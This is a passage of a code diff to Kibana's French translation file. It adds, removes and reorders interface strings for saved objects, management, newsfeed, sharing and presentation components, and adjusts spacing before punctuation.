Plein écran", "kibana-react.exitFullScreenButton.exitFullScreenModeButtonText": "Quitter le plein écran", @@ -5189,67 +4344,32 @@ "kibana-react.kibanaCodeEditor.ariaLabel": "Éditeur de code", "kibana-react.kibanaCodeEditor.enterKeyLabel": "Entrée", "kibana-react.kibanaCodeEditor.escapeKeyLabel": "Échap", - "kibana-react.kibanaCodeEditor.startEditing": "Appuyez sur {key} pour modifier.", - "kibana-react.kibanaCodeEditor.startEditingReadOnly": "Appuyez sur {key} pour interagir avec le code.", - "kibana-react.kibanaCodeEditor.stopEditing": "Appuyez sur {key} pour arrêter la modification.", - "kibana-react.kibanaCodeEditor.stopEditingReadOnly": "Appuyez sur {key} pour arrêter l'interaction.", "kibana-react.mountPointPortal.errorMessage": "Erreur lors du rendu du contenu du portail.", - "kibana-react.noDataPage.cantDecide": "Vous ne savez pas quoi utiliser ? {link}", "kibana-react.noDataPage.cantDecide.link": "Consultez la documentation pour en savoir plus.", - "kibana-react.noDataPage.elasticAgentCard.description": "Utilisez Elastic Agent pour collecter de manière simple et unifiée les données de vos machines.", + "kibana-react.noDataPage.elasticAgentCard.description": "Utilisez Elastic Agent pour collecter de manière simple et unifiée les données de vos machines.", "kibana-react.noDataPage.elasticAgentCard.noPermission.description": "Cette intégration n'est pas encore activée. Votre administrateur possède les autorisations requises pour l'activer.", "kibana-react.noDataPage.elasticAgentCard.noPermission.title": "Contactez votre administrateur", - "kibana-react.noDataPage.elasticAgentCard.title": "Ajouter Elastic Agent", - "kibana-react.noDataPage.intro": "Ajoutez vos données pour commencer, ou {link} sur {solution}.", + "kibana-react.noDataPage.elasticAgentCard.title": "Ajouter Elastic Agent", "kibana-react.noDataPage.intro.link": "en savoir plus", "kibana-react.noDataPage.noDataCard.description": "Continuer sans collecter de données", "kibana-react.noDataPage.noDataPage.recommended": "Recommandé", - "kibana-react.noDataPage.welcomeTitle": "Bienvenue dans Elastic {solution}.", "kibana-react.pageFooter.changeDefaultRouteSuccessToast": "Page de destination mise à jour", "kibana-react.pageFooter.changeHomeRouteLink": "Afficher une page différente à la connexion", "kibana-react.pageFooter.makeDefaultRouteLink": "Choisir comme page de destination", "kibana-react.solutionNav.collapsibleLabel": "Réduire la navigation latérale", - "kibana-react.solutionNav.mobileTitleText": "Menu {solutionName}", "kibana-react.solutionNav.openLabel": "Ouvrir la navigation latérale", "kibana-react.tableListView.lastUpdatedColumnTitle": "Dernière mise à jour", - "kibana-react.tableListView.listing.createNewItemButtonLabel": "Créer {entityName}", - "kibana-react.tableListView.listing.deleteButtonMessage": "Supprimer {itemCount} {entityName}", - "kibana-react.tableListView.listing.deleteConfirmModalDescription": "Vous ne pourrez pas récupérer les {entityNamePlural} supprimés.", - "kibana-react.tableListView.listing.deleteSelectedConfirmModal.title": "Supprimer {itemCount} {entityName} ?", "kibana-react.tableListView.listing.deleteSelectedItemsConfirmModal.cancelButtonLabel": "Annuler", "kibana-react.tableListView.listing.deleteSelectedItemsConfirmModal.confirmButtonLabel": "Supprimer", "kibana-react.tableListView.listing.deleteSelectedItemsConfirmModal.confirmButtonLabelDeleting": "Suppression", - "kibana-react.tableListView.listing.fetchErrorDescription": "Le listing {entityName} n'a pas pu être récupéré : {message}.", "kibana-react.tableListView.listing.fetchErrorTitle": "Échec de la récupération du listing", "kibana-react.tableListView.listing.listingLimitExceeded.advancedSettingsLinkText": "Paramètres avancés", - "kibana-react.tableListView.listing.listingLimitExceededDescription": "Vous avez {totalItems} {entityNamePlural}, mais votre paramètre {listingLimitText} empêche le tableau ci-dessous d'en afficher plus de {listingLimitValue}. Vous pouvez modifier ce paramètre sous {advancedSettingsLink}.", - "kibana-react.tableListView.listing.listingLimitExceededDescriptionNoPermissions": "Vous avez {totalItems} {entityNamePlural}, mais votre paramètre {listingLimitText} empêche le tableau ci-dessous d'en afficher plus de {listingLimitValue}. Contactez l'administrateur système pour modifier ce paramètre.", "kibana-react.tableListView.listing.listingLimitExceededTitle": "Limite de listing dépassée", "kibana-react.tableListView.listing.table.actionTitle": "Actions", "kibana-react.tableListView.listing.table.editActionDescription": "Modifier", - "kibana-react.tableListView.listing.unableToDeleteDangerMessage": "Impossible de supprimer la/le/les {entityName}(s)", "kibana-react.tableListView.updatedDateUnknownLabel": "Dernière mise à jour inconnue", - "kibanaOverview.addData.sampleDataButtonLabel": "Essayer l’exemple de données", - "kibanaOverview.addData.sectionTitle": "Ingérer des données", - "kibanaOverview.apps.title": "Explorer les applications", - "kibanaOverview.breadcrumbs.title": "Analytique", - "kibanaOverview.header.title": "Analytique", - "kibanaOverview.kibana.solution.description": "Explorez, visualisez et analysez vos données à l'aide d'une puissante suite d'outils et d'applications analytiques.", - "kibanaOverview.kibana.solution.title": "Analytique", - "kibanaOverview.manageData.sectionTitle": "Gérer vos données", - "kibanaOverview.more.title": "Toujours plus avec Elastic", - "kibanaOverview.news.title": "Nouveautés", - "lists.exceptions.doesNotExistOperatorLabel": "n'existe pas", - "lists.exceptions.existsOperatorLabel": "existe", - "lists.exceptions.isInListOperatorLabel": "est dans la liste", - "lists.exceptions.isNotInListOperatorLabel": "n'est pas dans la liste", - "lists.exceptions.isNotOneOfOperatorLabel": "n'est pas l'une des options suivantes", - "lists.exceptions.isNotOperatorLabel": "n'est pas", - "lists.exceptions.isOneOfOperatorLabel": "est l'une des options suivantes", - "lists.exceptions.isOperatorLabel": "est", - "lists.exceptions.matchesOperatorLabel": "correspond à", - "management.breadcrumb": "Gestion de la Suite", "management.landing.header": "Bienvenue dans Gestion de la Suite {version}", + "management.breadcrumb": "Gestion de la Suite", "management.landing.subhead": "Gérez vos index, vues de données, objets enregistrés, paramètres Kibana et plus encore.", "management.landing.text": "Vous trouverez une liste complète des applications dans le menu de gauche.", "management.nav.label": "Gestion", @@ -5265,29 +4385,29 @@ "management.sections.section.title": "Sécurité", "management.sections.stackTip": "Gérez votre licence et mettez la Suite à niveau.", "management.sections.stackTitle": "Suite", - "management.stackManagement.managementDescription": "La console centrale de gestion de la Suite Elastic.", + "management.stackManagement.managementDescription": "La console centrale de gestion de la Suite Elastic.", "management.stackManagement.managementLabel": "Gestion de la Suite", "management.stackManagement.title": "Gestion de la Suite", - "monaco.painlessLanguage.autocomplete.docKeywordDescription": "Accéder à une valeur de champ dans un script au moyen de la syntaxe doc['field_name']", - "monaco.painlessLanguage.autocomplete.emitKeywordDescription": "Émettre une valeur sans rien renvoyer", - "monaco.painlessLanguage.autocomplete.fieldValueDescription": "Récupérer la valeur du champ \"{fieldName}\"", - "monaco.painlessLanguage.autocomplete.paramsKeywordDescription": "Accéder aux variables transmises dans le script", + "newsfeed.flyoutList.versionTextLabel": "{version}", "newsfeed.emptyPrompt.noNewsText": "Si votre instance Kibana n'a pas accès à Internet, demandez à votre administrateur de désactiver cette fonctionnalité. Sinon, nous continuerons d'essayer de récupérer les actualités.", - "newsfeed.emptyPrompt.noNewsTitle": "Pas d'actualités ?", + "newsfeed.emptyPrompt.noNewsTitle": "Pas d'actualités ?", "newsfeed.flyoutList.closeButtonLabel": "Fermer", - "newsfeed.flyoutList.versionTextLabel": "{version}", "newsfeed.flyoutList.whatsNewTitle": "Nouveautés Elastic", "newsfeed.headerButton.readAriaLabel": "Menu du fil d'actualités – Tous les éléments lus", "newsfeed.headerButton.unreadAriaLabel": "Menu du fil d'actualités – Éléments non lus disponibles", "newsfeed.loadingPrompt.gettingNewsText": "Obtention des dernières actualités…", + "presentationUtil.expressionInput.argReferenceAliasesDetail": "{BOLD_MD_TOKEN}Alias{BOLD_MD_TOKEN} : {aliases}", + "presentationUtil.expressionInput.argReferenceDefaultDetail": "{BOLD_MD_TOKEN}Par défaut{BOLD_MD_TOKEN} : {defaultVal}", + "presentationUtil.expressionInput.argReferenceRequiredDetail": "{BOLD_MD_TOKEN}Requis{BOLD_MD_TOKEN} : {required}", + "presentationUtil.expressionInput.argReferenceTypesDetail": "{BOLD_MD_TOKEN}Types{BOLD_MD_TOKEN} : {types}", + "presentationUtil.expressionInput.functionReferenceAccepts": "{BOLD_MD_TOKEN}Accepte{BOLD_MD_TOKEN} : {acceptTypes}", + "presentationUtil.expressionInput.functionReferenceReturns": "{BOLD_MD_TOKEN}Renvoie{BOLD_MD_TOKEN} : {returnType}", + "presentationUtil.labs.components.disabledStatusMessage": "Par défaut : {status}", + "presentationUtil.labs.components.enabledStatusMessage": "Par défaut : {status}", + "presentationUtil.labs.components.noProjectsinSolutionMessage": "Aucun atelier actuellement dans {solutionName}.", + "presentationUtil.solutionToolbar.quickButton.ariaButtonLabel": "Créer {createType}", "presentationUtil.dashboardPicker.searchDashboardPlaceholder": "Recherche dans les tableaux de bord…", "presentationUtil.dataViewPicker.changeDataViewTitle": "Vue de données", - "presentationUtil.expressionInput.argReferenceAliasesDetail": "{BOLD_MD_TOKEN}Alias{BOLD_MD_TOKEN} : {aliases}", - "presentationUtil.expressionInput.argReferenceDefaultDetail": "{BOLD_MD_TOKEN}Par défaut{BOLD_MD_TOKEN} : {defaultVal}", - "presentationUtil.expressionInput.argReferenceRequiredDetail": "{BOLD_MD_TOKEN}Requis{BOLD_MD_TOKEN} : {required}", - "presentationUtil.expressionInput.argReferenceTypesDetail": "{BOLD_MD_TOKEN}Types{BOLD_MD_TOKEN} : {types}", - "presentationUtil.expressionInput.functionReferenceAccepts": "{BOLD_MD_TOKEN}Accepte{BOLD_MD_TOKEN} : {acceptTypes}", - "presentationUtil.expressionInput.functionReferenceReturns": "{BOLD_MD_TOKEN}Renvoie{BOLD_MD_TOKEN} : {returnType}", "presentationUtil.fieldPicker.noDataViewLabel": "Aucune vue de données sélectionnée", "presentationUtil.fieldPicker.noFieldsLabel": "Aucun champ correspondant", "presentationUtil.fieldSearch.fieldFilterButtonLabel": "Filtrer par type", @@ -5298,12 +4418,9 @@ "presentationUtil.labs.components.calloutHelp": "Actualiser pour appliquer les modifications", "presentationUtil.labs.components.closeButtonLabel": "Fermer", "presentationUtil.labs.components.descriptionMessage": "Essayez des fonctionnalités en cours ou en version d'évaluation technique.", - "presentationUtil.labs.components.disabledStatusMessage": "Par défaut : {status}", - "presentationUtil.labs.components.enabledStatusMessage": "Par défaut : {status}", "presentationUtil.labs.components.kibanaSwitchHelp": "Active cet atelier pour tous les utilisateurs Kibana.", "presentationUtil.labs.components.kibanaSwitchName": "Kibana", "presentationUtil.labs.components.labFlagsLabel": "Indicateurs d'atelier", - "presentationUtil.labs.components.noProjectsinSolutionMessage": "Aucun atelier actuellement dans {solutionName}.", "presentationUtil.labs.components.noProjectsMessage": "Aucun atelier actuellement disponible.", "presentationUtil.labs.components.overrideFlagsLabel": "Remplacements", "presentationUtil.labs.components.overridenIconTipLabel": "Valeur par défaut remplacée", @@ -5328,18 +4445,21 @@ "presentationUtil.saveModalDashboard.saveToLibraryLabel": "Enregistrer et ajouter à la bibliothèque", "presentationUtil.solutionToolbar.editorMenuButtonLabel": "Tous les éditeurs", "presentationUtil.solutionToolbar.libraryButtonLabel": "Ajouter depuis la bibliothèque", - "presentationUtil.solutionToolbar.quickButton.ariaButtonLabel": "Créer {createType}", "presentationUtil.solutionToolbar.quickButton.legendLabel": "Création rapide", + "savedObjects.confirmModal.overwriteConfirmationMessage": "Êtes-vous sûr de vouloir écraser {title} ?", + "savedObjects.confirmModal.overwriteTitle": "Écraser {name} ?", + "savedObjects.confirmModal.saveDuplicateButtonLabel": "Enregistrer {name}", + "savedObjects.confirmModal.saveDuplicateConfirmationMessage": "Il y a déjà une occurrence de {name} avec le titre \"{title}\". Voulez-vous tout de même enregistrer ?", + "savedObjects.saveModal.duplicateTitleLabel": "Ce {objectType} existe déjà.", + "savedObjects.saveModal.saveAsNewLabel": "Enregistrer en tant que nouveau {objectType}", + "savedObjects.saveModal.saveTitle": "Enregistrer {objectType}", + "savedObjects.saveModalOrigin.originAfterSavingSwitchLabel": "{originVerb} à {origin} après l'enregistrement", "savedObjects.advancedSettings.listingLimitText": "Nombre d'objets à récupérer pour les pages de listing", "savedObjects.advancedSettings.listingLimitTitle": "Limite de listing d’objets", "savedObjects.advancedSettings.perPageText": "Nombre d'objets à afficher par page dans la boîte de dialogue de chargement", "savedObjects.advancedSettings.perPageTitle": "Objets par page", "savedObjects.confirmModal.cancelButtonLabel": "Annuler", "savedObjects.confirmModal.overwriteButtonLabel": "Écraser", - "savedObjects.confirmModal.overwriteConfirmationMessage": "Êtes-vous sûr de vouloir écraser {title} ?", - "savedObjects.confirmModal.overwriteTitle": "Écraser {name} ?", - "savedObjects.confirmModal.saveDuplicateButtonLabel": "Enregistrer {name}", - "savedObjects.confirmModal.saveDuplicateConfirmationMessage": "Il y a déjà une occurrence de {name} avec le titre \"{title}\". Voulez-vous tout de même enregistrer ?", "savedObjects.finder.filterButtonLabel": "Types", "savedObjects.finder.searchPlaceholder": "Rechercher…", "savedObjects.finder.sortAsc": "Croissant", @@ -5351,64 +4471,70 @@ "savedObjects.saveModal.cancelButtonLabel": "Annuler", "savedObjects.saveModal.descriptionLabel": "Description", "savedObjects.saveModal.duplicateTitleDescription": "L'enregistrement de \"{title}\" crée un doublon de titre.", - "savedObjects.saveModal.duplicateTitleLabel": "Ce {objectType} existe déjà.", - "savedObjects.saveModal.saveAsNewLabel": "Enregistrer en tant que nouveau {objectType}", "savedObjects.saveModal.saveButtonLabel": "Enregistrer", - "savedObjects.saveModal.saveTitle": "Enregistrer {objectType}", "savedObjects.saveModal.titleLabel": "Titre", "savedObjects.saveModalOrigin.addToOriginLabel": "Ajouter", - "savedObjects.saveModalOrigin.originAfterSavingSwitchLabel": "{originVerb} à {origin} après l'enregistrement", "savedObjects.saveModalOrigin.returnToOriginLabel": "Renvoyer", "savedObjects.saveModalOrigin.saveAndReturnLabel": "Enregistrer et revenir", - "savedObjectsManagement.breadcrumb.index": "Objets enregistrés", "savedObjectsManagement.breadcrumb.inspect": "Inspecter {savedObjectType}", - "savedObjectsManagement.copyToSpace.actionDescription": "Effectuer une copie de cet objet enregistré dans un ou plusieurs espaces", - "savedObjectsManagement.copyToSpace.actionTitle": "Copier vers les espaces", - "savedObjectsManagement.deleteConfirm.modalDeleteButtonLabel": "Supprimer", - "savedObjectsManagement.deleteConfirm.modalDescription": "Cette action supprime définitivement l'objet de Kibana.", - "savedObjectsManagement.deleteConfirm.modalTitle": "Supprimer \"{title}\" ?", - "savedObjectsManagement.deleteSavedObjectsConfirmModalDescription": "Cette action supprimera les objets enregistrés suivants :", - "savedObjectsManagement.importSummary.createdCountHeader": "{createdCount} nouveau(x)", - "savedObjectsManagement.importSummary.createdOutcomeLabel": "Créé", + "savedObjectsManagement.importSummary.createdCountHeader": "{createdCount} nouveau(x)", "savedObjectsManagement.importSummary.errorCountHeader": "{errorCount} erreur(s)", "savedObjectsManagement.importSummary.errorOutcomeLabel": "{errorMessage}", - "savedObjectsManagement.importSummary.headerLabel": "{importCount, plural, one {1 objet importé} other {# objets importés}}", + "savedObjectsManagement.importSummary.headerLabel": "{importCount, plural, one {1 objet importé} other {# objets importés}}", "savedObjectsManagement.importSummary.overwrittenCountHeader": "{overwrittenCount} écrasé(s)", + "savedObjectsManagement.objectsTable.deleteConfirmModal.cannotDeleteCallout.content": "{objectCount, plural, one {# objet est masqué et ne peut pas être supprimé} other {# objets sont masqués et ne peuvent pas être supprimés}}. {objectCount, plural, one {Il a été exclu} other {Ils ont été exclus}} du récapitulatif du tableau.", + "savedObjectsManagement.objectsTable.deleteConfirmModal.sharedObjectsCallout.title": "{sharedObjectsCount, plural, one {# objet enregistré est partagé} other {# de vos objets enregistrés sont partagés}}.", + "savedObjectsManagement.objectsTable.deleteSavedObjectsConfirmModal.deleteButtonLabel": "Supprimer {objectsCount, plural, one {# objet} other {# objets}}", + "savedObjectsManagement.objectsTable.export.toastErrorMessage": "Impossible de générer l'export : {error}", + "savedObjectsManagement.objectsTable.exportObjectsConfirmModalTitle": "Exporter {filteredItemCount, plural, one {# objet} other {# objets}}", + "savedObjectsManagement.objectsTable.flyout.importFileErrorMessage": "Impossible de traiter le fichier en raison d'une erreur : \"{error}\".", + "savedObjectsManagement.objectsTable.flyout.indexPatternConflictsDescription": "Les objets enregistrés suivants utilisent des vues de données qui n'existent pas. Veuillez sélectionner les vues de données que vous souhaitez réassocier. Vous pouvez {indexPatternLink} si nécessaire.", + "savedObjectsManagement.objectsTable.header.exportButtonLabel": "Exporter {filteredCount, plural, one{# objet} other {# objets}}", + "savedObjectsManagement.objectsTable.overwriteModal.body.ambiguousConflict": "\"{title}\" est en conflit avec plusieurs objets existants. En écraser un ?", + "savedObjectsManagement.objectsTable.overwriteModal.body.conflict": "\"{title}\" est en conflit avec un objet existant. L'écraser ?", + "savedObjectsManagement.objectsTable.overwriteModal.title": "Écraser {type} ?", + "savedObjectsManagement.objectsTable.relationships.relationshipsTitle": "Voici les objets enregistrés associés à {title}. La suppression de ce {type} a un impact sur ses objets parents, mais pas sur ses enfants.", + "savedObjectsManagement.objectsTable.table.tooManyResultsLabel": "Affichage de {limit} sur {totalItemCount, plural, one {# objet} other {# objets}}", + "savedObjectsManagement.view.howToFixErrorDescription": "Si vous savez à quoi cette erreur fait référence, vous pouvez utiliser les {savedObjectsApis} pour la corriger. Sinon, cliquez sur le bouton Supprimer ci-dessus.", + "savedObjectsManagement.view.inspectCodeEditorAriaLabel": "inspecter { title }", + "savedObjectsManagement.view.inspectItemTitle": "Inspecter {title}", + "savedObjectsManagement.view.viewItemButtonLabel": "Afficher {title}", + "savedObjectsManagement.breadcrumb.index": "Objets enregistrés", + "savedObjectsManagement.copyToSpace.actionDescription": "Effectuer une copie de cet objet enregistré dans un ou plusieurs espaces", + "savedObjectsManagement.copyToSpace.actionTitle": "Copier vers les espaces", + "savedObjectsManagement.deleteConfirm.modalDeleteButtonLabel": "Supprimer", + "savedObjectsManagement.deleteConfirm.modalDescription": "Cette action supprime définitivement l'objet de Kibana.", + "savedObjectsManagement.deleteConfirm.modalTitle": "Supprimer \"{title}\" ?", + "savedObjectsManagement.deleteSavedObjectsConfirmModalDescription": "Cette action supprimera les objets enregistrés suivants :", + "savedObjectsManagement.importSummary.createdOutcomeLabel": "Créé", "savedObjectsManagement.importSummary.overwrittenOutcomeLabel": "Écrasé", "savedObjectsManagement.importSummary.warnings.defaultButtonLabel": "Go", "savedObjectsManagement.managementSectionLabel": "Objets enregistrés", "savedObjectsManagement.objects.savedObjectsDescription": "Importez, exportez et gérez vos objets enregistrés.", "savedObjectsManagement.objects.savedObjectsTitle": "Objets enregistrés", - "savedObjectsManagement.objectsTable.deleteConfirmModal.cannotDeleteCallout.content": "{objectCount, plural, one {# objet est masqué et ne peut pas être supprimé} other {# objets sont masqués et ne peuvent pas être supprimés}}. {objectCount, plural, one {Il a été exclu} other {Ils ont été exclus}} du récapitulatif du tableau.", "savedObjectsManagement.objectsTable.deleteConfirmModal.cannotDeleteCallout.title": "Certains objets ne peuvent pas être supprimés", "savedObjectsManagement.objectsTable.deleteConfirmModal.sharedObjectsCallout.content": "Les objets partagés sont supprimés de tous les espaces dans lesquels ils se trouvent.", - "savedObjectsManagement.objectsTable.deleteConfirmModal.sharedObjectsCallout.title": "{sharedObjectsCount, plural, one {# objet enregistré est partagé} other {# de vos objets enregistrés sont partagés}}.", "savedObjectsManagement.objectsTable.deleteSavedObjectsConfirmModal.cancelButtonLabel": "Annuler", - "savedObjectsManagement.objectsTable.deleteSavedObjectsConfirmModal.deleteButtonLabel": "Supprimer {objectsCount, plural, one {# objet} other {# objets}}", - "savedObjectsManagement.objectsTable.deleteSavedObjectsConfirmModal.idColumnName": "ID", + "savedObjectsManagement.objectsTable.deleteSavedObjectsConfirmModal.idColumnName": "Id", "savedObjectsManagement.objectsTable.deleteSavedObjectsConfirmModal.titleColumnName": "Titre", "savedObjectsManagement.objectsTable.deleteSavedObjectsConfirmModal.typeColumnName": "Type", "savedObjectsManagement.objectsTable.deleteSavedObjectsConfirmModalTitle": "Supprimer les objets enregistrés", "savedObjectsManagement.objectsTable.export.successNotification": "Votre fichier est en cours de téléchargement en arrière-plan.", "savedObjectsManagement.objectsTable.export.successWithExcludedObjectsNotification": "Votre fichier est en cours de téléchargement en arrière-plan. Certains objets ont été exclus de l'export. Vous trouverez la liste des objets exclus à la dernière ligne du fichier exporté.", "savedObjectsManagement.objectsTable.export.successWithMissingRefsNotification": "Votre fichier est en cours de téléchargement en arrière-plan. Certains objets associés sont introuvables. Vous trouverez la liste des objets manquants à la dernière ligne du fichier exporté.", - "savedObjectsManagement.objectsTable.export.toastErrorMessage": "Impossible de générer l'export : {error}", "savedObjectsManagement.objectsTable.exportObjectsConfirmModal.cancelButtonLabel": "Annuler", "savedObjectsManagement.objectsTable.exportObjectsConfirmModal.exportAllButtonLabel": "Exporter tout", "savedObjectsManagement.objectsTable.exportObjectsConfirmModal.exportOptionsLabel": "Options", "savedObjectsManagement.objectsTable.exportObjectsConfirmModal.includeReferencesDeepLabel": "Inclure les objets associés", "savedObjectsManagement.objectsTable.exportObjectsConfirmModalDescription": "Sélectionner les types d'objet à exporter", - "savedObjectsManagement.objectsTable.exportObjectsConfirmModalTitle": "Exporter {filteredItemCount, plural, one {# objet} other {# objets}}", "savedObjectsManagement.objectsTable.flyout.errorCalloutTitle": "Désolé, une erreur est survenue.", "savedObjectsManagement.objectsTable.flyout.import.cancelButtonLabel": "Annuler", "savedObjectsManagement.objectsTable.flyout.import.confirmButtonLabel": "Importer", - "savedObjectsManagement.objectsTable.flyout.importFileErrorMessage": "Impossible de traiter le fichier en raison d'une erreur : \"{error}\".", "savedObjectsManagement.objectsTable.flyout.importPromptText": "Importer", "savedObjectsManagement.objectsTable.flyout.importSavedObjectTitle": "Importer les objets enregistrés", "savedObjectsManagement.objectsTable.flyout.importSuccessful.confirmAllChangesButtonLabel": "Confirmer toutes les modifications", "savedObjectsManagement.objectsTable.flyout.importSuccessful.confirmButtonLabel": "Terminé", "savedObjectsManagement.objectsTable.flyout.indexPatternConflictsCalloutLinkText": "créer une nouvelle vue de données", - "savedObjectsManagement.objectsTable.flyout.indexPatternConflictsDescription": "Les objets enregistrés suivants utilisent des vues de données qui n'existent pas. Veuillez sélectionner les vues de données que vous souhaitez réassocier. Vous pouvez {indexPatternLink} si nécessaire.", "savedObjectsManagement.objectsTable.flyout.indexPatternConflictsTitle": "Conflits de vues de données", "savedObjectsManagement.objectsTable.flyout.renderConflicts.columnCountDescription": "Nombre d'objets concernés", "savedObjectsManagement.objectsTable.flyout.renderConflicts.columnCountName": "Décompte", @@ -5418,7 +4544,6 @@ "savedObjectsManagement.objectsTable.flyout.renderConflicts.columnSampleOfAffectedObjectsDescription": "Exemple d'objets concernés", "savedObjectsManagement.objectsTable.flyout.renderConflicts.columnSampleOfAffectedObjectsName": "Exemple d'objets concernés", "savedObjectsManagement.objectsTable.flyout.selectFileToImportFormRowLabel": "Sélectionner un fichier à importer", - "savedObjectsManagement.objectsTable.header.exportButtonLabel": "Exporter {filteredCount, plural, one{# objet} other {# objets}}", "savedObjectsManagement.objectsTable.header.importButtonLabel": "Importer", "savedObjectsManagement.objectsTable.header.refreshButtonLabel": "Actualiser", "savedObjectsManagement.objectsTable.header.savedObjectsTitle": "Objets enregistrés", @@ -5431,12 +4556,9 @@ "savedObjectsManagement.objectsTable.importModeControl.overwrite.disabledLabel": "Demander une action en cas de conflit", "savedObjectsManagement.objectsTable.importModeControl.overwrite.enabledLabel": "Écraser automatiquement les conflits", "savedObjectsManagement.objectsTable.importSummary.unsupportedTypeError": "Type d'objet non pris en charge", - "savedObjectsManagement.objectsTable.overwriteModal.body.ambiguousConflict": "\"{title}\" est en conflit avec plusieurs objets existants. En écraser un ?", - "savedObjectsManagement.objectsTable.overwriteModal.body.conflict": "\"{title}\" est en conflit avec un objet existant. L'écraser ?", "savedObjectsManagement.objectsTable.overwriteModal.cancelButtonText": "Ignorer", "savedObjectsManagement.objectsTable.overwriteModal.overwriteButtonText": "Écraser", "savedObjectsManagement.objectsTable.overwriteModal.selectControlLabel": "ID d'objet", - "savedObjectsManagement.objectsTable.overwriteModal.title": "Écraser {type} ?", "savedObjectsManagement.objectsTable.relationships.columnActions.inspectActionDescription": "Inspecter cet objet enregistré", "savedObjectsManagement.objectsTable.relationships.columnActions.inspectActionName": "Inspecter", "savedObjectsManagement.objectsTable.relationships.columnActionsName": "Actions", @@ -5452,7 +4574,6 @@ "savedObjectsManagement.objectsTable.relationships.columnTypeDescription": "Type de l'objet enregistré", "savedObjectsManagement.objectsTable.relationships.columnTypeName": "Type", "savedObjectsManagement.objectsTable.relationships.invalidRelationShip": "Cet objet enregistré présente des relations non valides.", - "savedObjectsManagement.objectsTable.relationships.relationshipsTitle": "Voici les objets enregistrés associés à {title}. La suppression de ce {type} a un impact sur ses objets parents, mais pas sur ses enfants.", "savedObjectsManagement.objectsTable.relationships.renderErrorMessage": "Erreur", "savedObjectsManagement.objectsTable.relationships.search.filters.relationship.childAsValue.view": "Enfant", "savedObjectsManagement.objectsTable.relationships.search.filters.relationship.name": "Relation directe", @@ -5473,7 +4594,6 @@ "savedObjectsManagement.objectsTable.table.exportButtonLabel": "Exporter", "savedObjectsManagement.objectsTable.table.exportPopoverButtonLabel": "Exporter", "savedObjectsManagement.objectsTable.table.lastUpdatedColumnTitle": "Dernière mise à jour", - "savedObjectsManagement.objectsTable.table.tooManyResultsLabel": "Affichage de {limit} sur {totalItemCount, plural, one {# objet} other {# objets}}", "savedObjectsManagement.objectsTable.table.typeFilterName": "Type", "savedObjectsManagement.objectsTable.table.updatedDateUnknownLabel": "Dernière mise à jour inconnue", "savedObjectsManagement.objectsTable.unableFindSavedObjectNotificationMessage": "Objet enregistré introuvable", @@ -5485,73 +4605,78 @@ "savedObjectsManagement.shareToSpace.columnTitle": "Espaces", "savedObjectsManagement.shareToSpace.globalObjectTypeContent": "Cet objet enregistré est disponible dans tous les espaces et ne peut pas être modifié.", "savedObjectsManagement.shareToSpace.globalObjectTypeTitle": "Objet enregistré global", - "savedObjectsManagement.shareToSpace.isolatedObjectTypeContent": "Cet objet enregistré est disponible dans un seul espace ; il ne peut pas être attribué à plusieurs espaces.", + "savedObjectsManagement.shareToSpace.isolatedObjectTypeContent": "Cet objet enregistré est disponible dans un seul espace ; il ne peut pas être attribué à plusieurs espaces.", "savedObjectsManagement.shareToSpace.isolatedObjectTypeTitle": "Objet enregistré isolé", "savedObjectsManagement.shareToSpace.shareableSoonObjectTypeContent": "Cet objet enregistré est disponible dans un seul espace. Dans une prochaine version, vous pourrez l'attribuer à plusieurs espaces.", - "savedObjectsManagement.shareToSpace.shareableSoonObjectTypeTitle": "Bientôt disponible : Attribuer un objet enregistré à plusieurs espaces", + "savedObjectsManagement.shareToSpace.shareableSoonObjectTypeTitle": "Bientôt disponible : Attribuer un objet enregistré à plusieurs espaces", "savedObjectsManagement.view.copyToClipboardLabel": "Copier dans le presse-papiers", "savedObjectsManagement.view.deleteItemButtonLabel": "Supprimer", "savedObjectsManagement.view.fieldDoesNotExistErrorMessage": "Un champ associé à cet objet n'existe plus dans la vue de données.", - "savedObjectsManagement.view.howToFixErrorDescription": "Si vous savez à quoi cette erreur fait référence, vous pouvez utiliser les {savedObjectsApis} pour la corriger. Sinon, cliquez sur le bouton Supprimer ci-dessus.", "savedObjectsManagement.view.howToFixErrorDescriptionLinkText": "API des objets enregistrés", "savedObjectsManagement.view.indexPatternDoesNotExistErrorMessage": "La vue de données associée à cet objet n'existe plus.", - "savedObjectsManagement.view.inspectCodeEditorAriaLabel": "inspecter { title }", - "savedObjectsManagement.view.inspectItemTitle": "Inspecter {title}", "savedObjectsManagement.view.savedObjectProblemErrorMessage": "Un problème est survenu avec cet objet enregistré.", "savedObjectsManagement.view.savedSearchDoesNotExistErrorMessage": "La recherche enregistrée associée à cet objet n'existe plus.", - "savedObjectsManagement.view.viewItemButtonLabel": "Afficher {title}", - "share.advancedSettings.csv.quoteValuesText": "Les valeurs doivent-elles être mises entre guillemets dans les exportations CSV ?", - "share.advancedSettings.csv.quoteValuesTitle": "Mettre les valeurs CSV entre guillemets", + "share.contextMenuTitle": "Partager ce {objectType}", + "share.urlPanel.canNotShareAsSavedObjectHelpText": "Impossible de partager comme objet enregistré tant que {objectType} n'a pas été enregistré.", + "share.urlPanel.savedObjectDescription": "Vous pouvez partager cette URL avec des personnes pour leur permettre de charger la version enregistrée la plus récente de ce {objectType}.", + "share.urlPanel.snapshotDescription": "Les URL de snapshot encodent l'état actuel de {objectType} dans l'URL elle-même. Les modifications apportées au {objectType} enregistré ne seront pas visibles via cette URL.", + "share.urlPanel.unableCreateShortUrlErrorMessage": "Impossible de créer une URL courte. Erreur : {errorMessage}.", + "share.urlService.redirect.RedirectManager.locatorNotFound": "Le localisateur [ID = {id}] n'existe pas.", + "share.advancedSettings.csv.quoteValuesText": "Les valeurs doivent-elles être mises entre guillemets dans les exportations CSV ?", + "share.advancedSettings.csv.quoteValuesTitle": "Mettre les valeurs CSV entre guillemets", "share.advancedSettings.csv.separatorText": "Séparer les valeurs exportées avec cette chaîne", - "share.advancedSettings.csv.separatorTitle": "Séparateur CSV", + "share.advancedSettings.csv.separatorTitle": "Séparateur CSV", "share.contextMenu.embedCodeLabel": "Incorporer le code", "share.contextMenu.embedCodePanelTitle": "Incorporer le code", "share.contextMenu.permalinkPanelTitle": "Permalien", "share.contextMenu.permalinksLabel": "Permaliens", - "share.contextMenuTitle": "Partager ce {objectType}", - "share.urlPanel.canNotShareAsSavedObjectHelpText": "Impossible de partager comme objet enregistré tant que {objectType} n'a pas été enregistré.", "share.urlPanel.copyIframeCodeButtonLabel": "Copier le code iFrame", "share.urlPanel.copyLinkButtonLabel": "Copier le lien", "share.urlPanel.generateLinkAsLabel": "Générer le lien en tant que", 